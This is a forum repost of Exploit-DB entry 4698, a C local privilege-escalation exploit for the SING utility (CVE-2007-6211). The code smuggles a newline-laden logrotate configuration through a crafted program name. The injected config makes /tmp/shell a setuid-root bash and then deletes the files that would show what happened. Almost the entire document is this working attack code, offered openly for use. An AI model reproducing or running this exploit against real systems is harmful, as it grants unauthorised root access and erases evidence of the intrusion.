Exploit Send ICMP Nasty Garbage (SING) - Append File Logrotate

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
4698
Проверка EDB
  1. Пройдено
Автор
BANNEDIT
Тип уязвимости
LOCAL
Платформа
LINUX
CVE
cve-2007-6211
Дата публикации
2007-12-06
C:
/*
 sing file append exploit
 by bannedit

 12/05/2007

 The original reporter of this issue included an example session which
 added an account to the machine.

 The method for this exploit is slightly different and much more
 quiet. Although it relies upon logrotate for help.

 This could easily be modified to work with cron daemons which
 are not too strict about the cron file format. However,
 when I tested vixie cron it appears that there are
 better checks for file format compilance these days.
*/

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

#define SING_PATH "/usr/bin/sing"

char *file = "/etc/logrotate.d/sing";
char *evilname = "\n/tmp/sing {\n    daily\n    size=0\n    firstaction\n        chown root /tmp/shell; chmod 4755 /tmp/shell; rm -f /etc/logrotate.d/sing; rm -f /tmp/sing*\n    endscript\n}\n\n\n";



int main()
{
FILE *fp;
int pid;

        puts("sing file append exploit");
        puts("------------------------");
        puts("by bannedit");

        if(fp = fopen("/tmp/shell", "w+"))
        {
           fputs("#!/bin/bash\n", fp);
           fputs("/bin/bash -p", fp);
           fclose(fp);
           system("touch /tmp/sing; echo garbage >> /tmp/sing");
        }
        else
        {
           puts("error making shell file");
           exit(-1);
        }

        sleep(5);
        printf("done sleeping...\n");
        execl(SING_PATH, evilname, "-Q", "-c", "1", "-L", file, "localhost", 0);
        return 0;
}

// milw0rm.com [2007-12-06]
 
Источник
www.exploit-db.com

Похожие темы